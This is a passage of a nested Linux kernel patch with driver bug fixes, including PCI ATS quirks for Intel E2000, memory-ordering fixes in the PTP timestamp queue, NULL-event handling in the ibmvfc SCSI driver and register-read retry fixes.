+index 30e7c627f21a7..48389785d9247 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5288,7 +5288,7 @@ int pci_dev_specific_disable_acs_redir(struct pci_dev *dev)
+  */
+ static void quirk_intel_qat_vf_cap(struct pci_dev *pdev)
+ {
+-	int pos, i = 0;
++	int pos, i = 0, ret;
+ 	u8 next_cap;
+ 	u16 reg16, *cap;
+ 	struct pci_cap_saved_state *state;
+@@ -5334,8 +5334,8 @@ static void quirk_intel_qat_vf_cap(struct pci_dev *pdev)
+ 		pdev->pcie_mpss = reg16 & PCI_EXP_DEVCAP_PAYLOAD;
+ 
+ 		pdev->cfg_size = PCI_CFG_SPACE_EXP_SIZE;
+-		if (pci_read_config_dword(pdev, PCI_CFG_SPACE_SIZE, &status) !=
+-		    PCIBIOS_SUCCESSFUL || (status == 0xffffffff))
++		ret = pci_read_config_dword(pdev, PCI_CFG_SPACE_SIZE, &status);
++		if ((ret != PCIBIOS_SUCCESSFUL) || (PCI_POSSIBLE_ERROR(status)))
+ 			pdev->cfg_size = PCI_CFG_SPACE_SIZE;
+ 
+ 		if (pci_find_saved_cap(pdev, PCI_CAP_ID_EXP))
+@@ -5404,6 +5404,12 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0420, quirk_no_ext_tags);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0422, quirk_no_ext_tags);
+ 
+ #ifdef CONFIG_PCI_ATS
++static void quirk_no_ats(struct pci_dev *pdev)
++{
++	pci_info(pdev, "disabling ATS\n");
++	pdev->ats_cap = 0;
++}
++
+ /*
+  * Some devices require additional driver setup to enable ATS.  Don't use
+  * ATS for those devices as ATS will be enabled before the driver has had a
+@@ -5417,14 +5423,10 @@ static void quirk_amd_harvest_no_ats(struct pci_dev *pdev)
+ 		    (pdev->subsystem_device == 0xce19 ||
+ 		     pdev->subsystem_device == 0xcc10 ||
+ 		     pdev->subsystem_device == 0xcc08))
+-			goto no_ats;
+-		else
+-			return;
++			quirk_no_ats(pdev);
++	} else {
++		quirk_no_ats(pdev);
+ 	}
+-
+-no_ats:
+-	pci_info(pdev, "disabling ATS\n");
+-	pdev->ats_cap = 0;
+ }
+ 
+ /* AMD Stoney platform GPU */
+@@ -5447,6 +5449,25 @@ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x7347, quirk_amd_harvest_no_ats);
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x734f, quirk_amd_harvest_no_ats);
+ /* AMD Raven platform iGPU */
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x15d8, quirk_amd_harvest_no_ats);
++
++/*
++ * Intel IPU E2000 revisions before C0 implement incorrect endianness
++ * in ATS Invalidate Request message body. Disable ATS for those devices.
++ */
++static void quirk_intel_e2000_no_ats(struct pci_dev *pdev)
++{
++	if (pdev->revision < 0x20)
++		quirk_no_ats(pdev);
++}
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1451, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1452, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1453, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1454, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1455, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1457, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1459, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x145a, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x145c, quirk_intel_e2000_no_ats);
+ #endif /* CONFIG_PCI_ATS */
+ 
+ /* Freescale PCIe doesn't support MSI in RC mode */
+diff --git a/drivers/platform/chrome/cros_ec_proto_test.c b/drivers/platform/chrome/cros_ec_proto_test.c
+index c6a83df91ae1e..b46a8bc2196fe 100644
+--- a/drivers/platform/chrome/cros_ec_proto_test.c
++++ b/drivers/platform/chrome/cros_ec_proto_test.c
+@@ -2667,6 +2667,7 @@ static int cros_ec_proto_test_init(struct kunit *test)
+ 	ec_dev->dev->release = cros_ec_proto_test_release;
+ 	ec_dev->cmd_xfer = cros_kunit_ec_xfer_mock;
+ 	ec_dev->pkt_xfer = cros_kunit_ec_xfer_mock;
++	mutex_init(&ec_dev->lock);
+ 
+ 	priv->msg = (struct cros_ec_command *)priv->_msg;
+ 
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 3bb60687f2e42..05a55bc31c796 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10019,6 +10019,7 @@ static const struct tpacpi_quirk battery_quirk_table[] __initconst = {
+ 	 * Individual addressing is broken on models that expose the
+ 	 * primary battery as BAT1.
+ 	 */
++	TPACPI_Q_LNV('8', 'F', true),       /* Thinkpad X120e */
+ 	TPACPI_Q_LNV('J', '7', true),       /* B5400 */
+ 	TPACPI_Q_LNV('J', 'I', true),       /* Thinkpad 11e */
+ 	TPACPI_Q_LNV3('R', '0', 'B', true), /* Thinkpad 11e gen 3 */
+diff --git a/drivers/ptp/ptp_chardev.c b/drivers/ptp/ptp_chardev.c
+index af3bc65c4595d..9311f3d09c8fc 100644
+--- a/drivers/ptp/ptp_chardev.c
++++ b/drivers/ptp/ptp_chardev.c
+@@ -487,7 +487,8 @@ ssize_t ptp_read(struct posix_clock *pc,
+ 
+ 	for (i = 0; i < cnt; i++) {
+ 		event[i] = queue->buf[queue->head];
+-		queue->head = (queue->head + 1) % PTP_MAX_TIMESTAMPS;
++		/* Paired with READ_ONCE() in queue_cnt() */
++		WRITE_ONCE(queue->head, (queue->head + 1) % PTP_MAX_TIMESTAMPS);
+ 	}
+ 
+ 	spin_unlock_irqrestore(&queue->lock, flags);
+diff --git a/drivers/ptp/ptp_clock.c b/drivers/ptp/ptp_clock.c
+index 51cae72bb6db2..3c3e4fbefebaf 100644
+--- a/drivers/ptp/ptp_clock.c
++++ b/drivers/ptp/ptp_clock.c
+@@ -56,10 +56,11 @@ static void enqueue_external_timestamp(struct timestamp_event_queue *queue,
+ 	dst->t.sec = seconds;
+ 	dst->t.nsec = remainder;
+ 
++	/* Both WRITE_ONCE() are paired with READ_ONCE() in queue_cnt() */
+ 	if (!queue_free(queue))
+-		queue->head = (queue->head + 1) % PTP_MAX_TIMESTAMPS;
++		WRITE_ONCE(queue->head, (queue->head + 1) % PTP_MAX_TIMESTAMPS);
+ 
+-	queue->tail = (queue->tail + 1) % PTP_MAX_TIMESTAMPS;
++	WRITE_ONCE(queue->tail, (queue->tail + 1) % PTP_MAX_TIMESTAMPS);
+ 
+ 	spin_unlock_irqrestore(&queue->lock, flags);
+ }
+diff --git a/drivers/ptp/ptp_private.h b/drivers/ptp/ptp_private.h
+index 75f58fc468a71..b8d4f61f14be4 100644
+--- a/drivers/ptp/ptp_private.h
++++ b/drivers/ptp/ptp_private.h
+@@ -76,9 +76,13 @@ struct ptp_vclock {
+  * that a writer might concurrently increment the tail does not
+  * matter, since the queue remains nonempty nonetheless.
+  */
+-static inline int queue_cnt(struct timestamp_event_queue *q)
++static inline int queue_cnt(const struct timestamp_event_queue *q)
+ {
+-	int cnt = q->tail - q->head;
++	/*
++	 * Paired with WRITE_ONCE() in enqueue_external_timestamp(),
++	 * ptp_read(), extts_fifo_show().
++	 */
++	int cnt = READ_ONCE(q->tail) - READ_ONCE(q->head);
+ 	return cnt < 0 ? PTP_MAX_TIMESTAMPS + cnt : cnt;
+ }
+ 
+diff --git a/drivers/ptp/ptp_sysfs.c b/drivers/ptp/ptp_sysfs.c
+index f30b0a4394705..74b9c794d6363 100644
+--- a/drivers/ptp/ptp_sysfs.c
++++ b/drivers/ptp/ptp_sysfs.c
+@@ -79,7 +79,8 @@ static ssize_t extts_fifo_show(struct device *dev,
+ 	qcnt = queue_cnt(queue);
+ 	if (qcnt) {
+ 		event = queue->buf[queue->head];
+-		queue->head = (queue->head + 1) % PTP_MAX_TIMESTAMPS;
++		/* Paired with READ_ONCE() in queue_cnt() */
++		WRITE_ONCE(queue->head, (queue->head + 1) % PTP_MAX_TIMESTAMPS);
+ 	}
+ 	spin_unlock_irqrestore(&queue->lock, flags);
+ 
+diff --git a/drivers/s390/crypto/ap_bus.c b/drivers/s390/crypto/ap_bus.c
+index b02c631f3b71a..4c0f9fe1ba779 100644
+--- a/drivers/s390/crypto/ap_bus.c
++++ b/drivers/s390/crypto/ap_bus.c
+@@ -1012,6 +1012,10 @@ EXPORT_SYMBOL(ap_driver_unregister);
+ 
+ void ap_bus_force_rescan(void)
+ {
++	/* Only trigger AP bus scans after the initial scan is done */
++	if (atomic64_read(&ap_scan_bus_count) <= 0)
++		return;
++
+ 	/* processing an asynchronous bus rescan */
+ 	del_timer(&ap_config_timer);
+ 	queue_work(system_long_wq, &ap_scan_work);
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index c0e74d768716d..c4305ec38ebf3 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -4717,6 +4717,12 @@ static void debugfs_bist_init_v3_hw(struct hisi_hba *hisi_hba)
+ 	hisi_hba->debugfs_bist_linkrate = SAS_LINK_RATE_1_5_GBPS;
+ }
+ 
++static void debugfs_exit_v3_hw(struct hisi_hba *hisi_hba)
++{
++	debugfs_remove_recursive(hisi_hba->debugfs_dir);
++	hisi_hba->debugfs_dir = NULL;
++}
++
+ static void debugfs_init_v3_hw(struct hisi_hba *hisi_hba)
+ {
+ 	struct device *dev = hisi_hba->dev;
+@@ -4740,18 +4746,13 @@ static void debugfs_init_v3_hw(struct hisi_hba *hisi_hba)
+ 
+ 	for (i = 0; i < hisi_sas_debugfs_dump_count; i++) {
+ 		if (debugfs_alloc_v3_hw(hisi_hba, i)) {
+-			debugfs_remove_recursive(hisi_hba->debugfs_dir);
++			debugfs_exit_v3_hw(hisi_hba);
+ 			dev_dbg(dev, "failed to init debugfs!\n");
+ 			break;
+ 		}
+ 	}
+ }
+ 
+-static void debugfs_exit_v3_hw(struct hisi_hba *hisi_hba)
+-{
+-	debugfs_remove_recursive(hisi_hba->debugfs_dir);
+-}
+-
+ static int
+ hisi_sas_v3_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+diff --git a/drivers/scsi/ibmvscsi/ibmvfc.c b/drivers/scsi/ibmvscsi/ibmvfc.c
+index 41148b0430df9..013f5c05e9f39 100644
+--- a/drivers/scsi/ibmvscsi/ibmvfc.c
++++ b/drivers/scsi/ibmvscsi/ibmvfc.c
+@@ -1518,7 +1518,11 @@ static struct ibmvfc_event *ibmvfc_get_event(struct ibmvfc_queue *queue)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&queue->l_lock, flags);
+-	BUG_ON(list_empty(&queue->free));
++	if (list_empty(&queue->free)) {
++		ibmvfc_log(queue->vhost, 4, "empty event pool on queue:%ld\n", queue->hwq_id);
++		spin_unlock_irqrestore(&queue->l_lock, flags);
++		return NULL;
++	}
+ 	evt = list_entry(queue->free.next, struct ibmvfc_event, queue_list);
+ 	atomic_set(&evt->free, 0);
+ 	list_del(&evt->queue_list);
+@@ -1947,9 +1951,15 @@ static int ibmvfc_queuecommand(struct Scsi_Host *shost, struct scsi_cmnd *cmnd)
+ 	if (vhost->using_channels) {
+ 		scsi_channel = hwq % vhost->scsi_scrqs.active_queues;
+ 		evt = ibmvfc_get_event(&vhost->scsi_scrqs.scrqs[scsi_channel]);
++		if (!evt)
++			return SCSI_MLQUEUE_HOST_BUSY;
++
+ 		evt->hwq = hwq % vhost->scsi_scrqs.active_queues;
+-	} else
++	} else {
+ 		evt = ibmvfc_get_event(&vhost->crq);
++		if (!evt)
++			return SCSI_MLQUEUE_HOST_BUSY;
++	}
+ 
+ 	ibmvfc_init_event(evt, ibmvfc_scsi_done, IBMVFC_CMD_FORMAT);
+ 	evt->cmnd = cmnd;
+@@ -2037,6 +2047,11 @@ static int ibmvfc_bsg_timeout(struct bsg_job *job)
+ 
+ 	vhost->aborting_passthru = 1;
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		spin_unlock_irqrestore(vhost->host->host_lock, flags);
++		return -ENOMEM;
++	}
++
+ 	ibmvfc_init_event(evt, ibmvfc_bsg_timeout_done, IBMVFC_MAD_FORMAT);
+ 
+ 	tmf = &evt->iu.tmf;
+@@ -2095,6 +2110,10 @@ static int ibmvfc_bsg_plogi(struct ibmvfc_host *vhost, unsigned int port_id)
+ 		goto unlock_out;
+ 
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		rc = -ENOMEM;
++		goto unlock_out;
++	}
+ 	ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_MAD_FORMAT);
+ 	plogi = &evt->iu.plogi;
+ 	memset(plogi, 0, sizeof(*plogi));
+@@ -2213,6 +2232,11 @@ static int ibmvfc_bsg_request(struct bsg_job *job)
+ 	}
+ 
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		spin_unlock_irqrestore(vhost->host->host_lock, flags);
++		rc = -ENOMEM;
++		goto out;
++	}
+ 	ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_MAD_FORMAT);
+ 	mad = &evt->iu.passthru;
+ 
+@@ -2301,6 +2325,11 @@ static int ibmvfc_reset_device(struct scsi_device *sdev, int type, char *desc)
+ 		else
+ 			evt = ibmvfc_get_event(&vhost->crq);
+ 
++		if (!evt) {
++			spin_unlock_irqrestore(vhost->host->host_lock, flags);
++			return -ENOMEM;
++		}
++
+ 		ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_CMD_FORMAT);
+ 		tmf = ibmvfc_init_vfc_cmd(evt, sdev);
+ 		iu = ibmvfc_get_fcp_iu(vhost, tmf);
+@@ -2504,6 +2533,8 @@ static struct ibmvfc_event *ibmvfc_init_tmf(struct ibmvfc_queue *queue,
+ 	struct ibmvfc_tmf *tmf;
+ 
+ 	evt = ibmvfc_get_event(queue);
++	if (!evt)
++		return NULL;
+ 	ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_MAD_FORMAT);
+ 
+ 	tmf = &evt->iu.tmf;
+@@ -2560,6 +2591,11 @@ static int ibmvfc_cancel_all_mq(struct scsi_device *sdev, int type)
+ 
+ 		if (found_evt && vhost->logged_in) {
+ 			evt = ibmvfc_init_tmf(&queues[i], sdev, type);
++			if (!evt) {
++				spin_unlock(queues[i].q_lock);
++				spin_unlock_irqrestore(vhost->host->host_lock, flags);
++				return -ENOMEM;
++			}
+ 			evt->sync_iu = &queues[i].cancel_rsp;
+ 			ibmvfc_send_event(evt, vhost, default_timeout);
+ 			list_add_tail(&evt->cancel, &cancelq);
+@@ -2773,6 +2809,10 @@ static int ibmvfc_abort_task_set(struct scsi_device *sdev)
+ 
+ 	if (vhost->state == IBMVFC_ACTIVE) {
+ 		evt = ibmvfc_get_event(&vhost->crq);
++		if (!evt) {
++			spin_unlock_irqrestore(vhost->host->host_lock, flags);
++			return -ENOMEM;
++		}
+ 		ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_CMD_FORMAT);
+ 		tmf = ibmvfc_init_vfc_cmd(evt, sdev);
+ 		iu = ibmvfc_get_fcp_iu(vhost, tmf);
+@@ -4031,6 +4071,12 @@ static void ibmvfc_tgt_send_prli(struct ibmvfc_target *tgt)
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_prli_done, IBMVFC_MAD_FORMAT);
+ 	evt->tgt = tgt;
+@@ -4138,6 +4184,12 @@ static void ibmvfc_tgt_send_plogi(struct ibmvfc_target *tgt)
+ 	kref_get(&tgt->kref);
+ 	tgt->logo_rcvd = 0;
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_INIT_WAIT);
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_plogi_done, IBMVFC_MAD_FORMAT);
+@@ -4214,6 +4266,8 @@ static struct ibmvfc_event *__ibmvfc_tgt_get_implicit_logout_evt(struct ibmvfc_t
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt)
++		return NULL;
+ 	ibmvfc_init_event(evt, done, IBMVFC_MAD_FORMAT);
+ 	evt->tgt = tgt;
+ 	mad = &evt->iu.implicit_logout;
+@@ -4241,6 +4295,13 @@ static void ibmvfc_tgt_implicit_logout(struct ibmvfc_target *tgt)
+ 	vhost->discovery_threads++;
+ 	evt = __ibmvfc_tgt_get_implicit_logout_evt(tgt,
+ 						   ibmvfc_tgt_implicit_logout_done);
++	if (!evt) {
++		vhost->discovery_threads--;
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 
+ 	ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_INIT_WAIT);
+ 	if (ibmvfc_send_event(evt, vhost, default_timeout)) {
+@@ -4380,6 +4441,12 @@ static void ibmvfc_tgt_move_login(struct ibmvfc_target *tgt)
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_DEL_RPORT);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_INIT_WAIT);
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_move_login_done, IBMVFC_MAD_FORMAT);
+@@ -4546,6 +4613,14 @@ static void ibmvfc_adisc_timeout(struct timer_list *t)
+ 	vhost->abort_threads++;
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		tgt_err(tgt, "Failed to get cancel event for ADISC.\n");
++		vhost->abort_threads--;
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		spin_unlock_irqrestore(vhost->host->host_lock, flags);
++		return;
++	}
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_adisc_cancel_done, IBMVFC_MAD_FORMAT);
+ 
+ 	evt->tgt = tgt;
+@@ -4596,6 +4671,12 @@ static void ibmvfc_tgt_adisc(struct ibmvfc_target *tgt)
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_adisc_done, IBMVFC_MAD_FORMAT);
+ 	evt->tgt = tgt;
+@@ -4699,6 +4780,12 @@ static void ibmvfc_tgt_query_target(struct ibmvfc_target *tgt)
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	evt->tgt = tgt;
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_query_target_done, IBMVFC_MAD_FORMAT);
+@@ -4871,6 +4958,13 @@ static void ibmvfc_discover_targets(struct ibmvfc_host *vhost)
+ {
+ 	struct ibmvfc_discover_targets *mad;
+ 	struct ibmvfc_event *evt = ibmvfc_get_event(&vhost->crq);
++	int level = IBMVFC_DEFAULT_LOG_LEVEL;
++
++	if (!evt) {
++		ibmvfc_log(vhost, level, "Discover Targets failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
+ 
+ 	ibmvfc_init_event(evt, ibmvfc_discover_targets_done, IBMVFC_MAD_FORMAT);
+ 	mad = &evt->iu.discover_targets;
+@@ -4948,8 +5042,15 @@ static void ibmvfc_channel_setup(struct ibmvfc_host *vhost)
+ 	struct ibmvfc_scsi_channels *scrqs = &vhost->scsi_scrqs;
+ 	unsigned int num_channels =
+ 		min(vhost->client_scsi_channels, vhost->max_vios_scsi_channels);
++	int level = IBMVFC_DEFAULT_LOG_LEVEL;
+ 	int i;
+ 
++	if (!evt) {
++		ibmvfc_log(vhost, level, "Channel Setup failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
++
+ 	memset(setup_buf, 0, sizeof(*setup_buf));
+ 	if (num_channels == 0)
+ 		setup_buf->flags = cpu_to_be32(IBMVFC_CANCEL_CHANNELS);
+@@ -5011,6 +5112,13 @@ static void ibmvfc_channel_enquiry(struct ibmvfc_host *vhost)
+ {
+ 	struct ibmvfc_channel_enquiry *mad;
+ 	struct ibmvfc_event *evt = ibmvfc_get_event(&vhost->crq);
++	int level = IBMVFC_DEFAULT_LOG_LEVEL;
++
++	if (!evt) {
++		ibmvfc_log(vhost, level, "Channel Enquiry failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
+ 
+ 	ibmvfc_init_event(evt, ibmvfc_channel_enquiry_done, IBMVFC_MAD_FORMAT);
+ 	mad = &evt->iu.channel_enquiry;
+@@ -5133,6 +5241,12 @@ static void ibmvfc_npiv_login(struct ibmvfc_host *vhost)
+ 	struct ibmvfc_npiv_login_mad *mad;
+ 	struct ibmvfc_event *evt = ibmvfc_get_event(&vhost->crq);
+ 
++	if (!evt) {
++		ibmvfc_dbg(vhost, "NPIV Login failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
++
+ 	ibmvfc_gather_partition_info(vhost);
+ 	ibmvfc_set_login_info(vhost);
+ 	ibmvfc_init_event(evt, ibmvfc_npiv_login_done, IBMVFC_MAD_FORMAT);
+@@ -5197,6 +5311,12 @@ static void ibmvfc_npiv_logout(struct ibmvfc_host *vhost)
+ 	struct ibmvfc_event *evt;
+ 
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_dbg(vhost, "NPIV Logout failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
++
+ 	ibmvfc_init_event(evt, ibmvfc_npiv_logout_done, IBMVFC_MAD_FORMAT);
+ 
+ 	mad = &evt->iu.npiv_logout;
+diff --git a/drivers/scsi/libfc/fc_lport.c b/drivers/scsi/libfc/fc_lport.c
+index 9c02c9523c4d4..ab06e9aeb613e 100644
+--- a/drivers/scsi/libfc/fc_lport.c
++++ b/drivers/scsi/libfc/fc_lport.c
+@@ -241,6 +241,12 @@ static void fc_lport_ptp_setup(struct fc_lport *lport,
+ 	}
+ 	mutex_lock(&lport->disc.disc_mutex);
+ 	lport->ptp_rdata = fc_rport_create(lport, remote_fid);
++	if (!lport->ptp_rdata) {
++		printk(KERN_WARNING "libfc: Failed to setup lport 0x%x\n",
++			lport->port_id);
++		mutex_unlock(&lport->disc.disc_mutex);
++		return;
++	}
+ 	kref_get(&lport->ptp_rdata->kref);
+ 	lport->ptp_rdata->ids.port_name = remote_wwpn;
+ 	lport->ptp_rdata->ids.node_name = remote_wwnn;
+diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
+index e392a984c7b87..37208bc08c667 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_base.c
++++ b/drivers/scsi/megaraid/megaraid_sas_base.c
+@@ -263,13 +263,13 @@ u32 megasas_readl(struct megasas_instance *instance,
+ 	 * Fusion registers could intermittently return all zeroes.
+ 	 * This behavior is transient in nature and subsequent reads will
+ 	 * return valid value. As a workaround in driver, retry readl for
+-	 * upto three times until a non-zero value is read.
++	 * up to thirty times until a non-zero value is read.
+ 	 */
+ 	if (instance->adapter_type == AERO_SERIES) {
+ 		do {
+ 			ret_val = readl(addr);
+ 			i++;
+-		} while (ret_val == 0 && i < 3);
++		} while (ret_val == 0 && i < 30);
+ 		return ret_val;
+ 	} else {
+ 		return readl(addr);
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 2093888f154e0..809be43f440dc 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -224,8 +224,8 @@ _base_readl_ext_retry(const volatile void __iomem *addr)
+ 
+ 	for (i = 0 ; i < 30 ; i++) {
+ 		ret_val = readl(addr);
+-		if (ret_val == 0)
+-			continue;
++		if (ret_val != 0)
++			break;
+ 	}
+ 
+ 	return ret_val;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index b33ffec1cb75e..25ca0544b9639 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -1831,8 +1831,16 @@ static void qla2x00_abort_srb(struct qla_qpair *qp, srb_t *sp, const int res,
+ 		}
+ 
+ 		spin_lock_irqsave(qp->qp_lock_ptr, *flags);
+-		if (ret_cmd && blk_mq_request_started(scsi_cmd_to_rq(cmd)))
+-			sp->done(sp, res);
++		switch (sp->type) {
++		case SRB_SCSI_CMD:
++			if (ret_cmd && blk_mq_request_started(scsi_cmd_to_rq(cmd)))
++				sp->done(sp, res);
++			break;
++		default:
++			if (ret_cmd)
++				sp->done(sp, res);
++			break;
++		}
+ 	} else {
+ 		sp->done(sp, res);
+ 	}
+diff --git a/drivers/soc/bcm/bcm2835-power.c b/drivers/soc/bcm/bcm2835-power.c
+index 5bcd047768b60..cbcd1298ef5bd 100644
+--- a/drivers/soc/bcm/bcm2835-power.c
++++ b/drivers/soc/bcm/bcm2835-power.c
+@@ -175,7 +175,7 @@ static int bcm2835_asb_control(struct bcm2835_power *power, u32 reg, bool enable
+ 	}
+ 	writel(PM_PASSWORD | val, base + reg);
+ 
+-	while (readl(base + reg) & ASB_ACK) {
++	while (!!(readl(base + reg) & ASB_ACK) == enable) {
+ 		cpu_relax();
+ 		if (ktime_get_ns() - start >= 1000)
+ 			return -ETIMEDOUT;
+diff --git a/drivers/soc/imx/gpc.c b/drivers/soc/imx/gpc.c
+index 90a8b2c0676ff..419ed15cc10c4 100644
+--- a/drivers/soc/imx/gpc.c
++++ b/drivers/soc/imx/gpc.c
+@@ -498,6 +498,7 @@ static int imx_gpc_probe(struct platform_device *pdev)
+ 
+ 			pd_pdev->dev.parent = &pdev->dev;
+ 			pd_pdev->dev.of_node = np;
++			pd_pdev->dev.fwnode = of_fwnode_handle(np);
+ 
+ 			ret = platform_device_add(pd_pdev);
+ 			if (ret) {
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index 2a1096dab63d3..9ebdd0cd0b1cf 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -141,7 +141,7 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16-k0xxx"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16"),
+ 		},
+ 		.driver_data = (void *)hp_omen_16,
+ 	},
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index 8c2ee431fcde8..4ab3803e10c83 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -30,6 +30,9 @@ static void quirk_usb3_maximum_bandwidth(struct tb_switch *sw)
+ {
+ 	struct tb_port *port;
+ 
++	if (tb_switch_is_icm(sw))
++		return;
++
+ 	tb_switch_for_each_port(sw, port) {
+ 		if (!tb_port_is_usb3_down(port))
+ 			continue;
+diff --git a/drivers/tty/hvc/hvc_xen.c b/drivers/tty/hvc/hvc_xen.c
+index d9d0232753286..281bc83acfadd 100644
+--- a/drivers/tty/hvc/hvc_xen.c
++++ b/drivers/tty/hvc/hvc_xen.c
+@@ -377,18 +377,21 @@ void xen_console_resume(void)
